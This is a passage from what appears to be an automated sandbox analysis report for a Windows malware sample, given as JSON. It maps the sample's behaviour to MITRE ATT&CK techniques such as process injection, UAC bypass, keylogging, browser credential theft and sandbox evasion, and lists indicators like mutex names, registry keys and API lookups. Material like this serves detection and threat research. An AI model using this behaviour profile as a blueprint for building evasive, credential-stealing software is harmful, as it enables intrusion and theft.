{"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 19}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 5, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Desktop Protocol", "attck_id": "T1021.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021/001", "informative_identifiers_count": 1, "parent": {"technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 3, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 5, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Domain Generation Algorithms", "attck_id": "T1568.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568/002", "informative_identifiers_count": 1, "parent": {"technique": "Dynamic Resolution", "attck_id": "T1568", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Rmcrfdcuvikuihbivuyrs-D47AW4\"\n \"\\Sessions\\1\\BaseNamedObjects\\Rmcrfdcuvikuihbivuyrs-D47AW4\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" touched \"WinInetBroker Class\" (Path: \"HKCU\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" touched \"PSFactoryBuffer\" (Path: \"HKCU\\CLSID\\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" touched \"Network List Manager\" (Path: \"HKCU\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\\LOCALSERVER32\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" touched \"NetworkListManager\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb\" file has an entrypoint instructions - \"call\t0x43528d,jmp\t0x434be8,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\t0x17,call\t0x4570c9,test\teax, eax,je\t0x434d88,mov\tecx, dword ptr [ebp + 8],int\t0x29,push\t3,call\t0x434f4e,mov\tdword ptr [esp], 0x2cc,lea\teax, [ebp - 0x324],push\t0,push\teax,call\t0x437280,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime 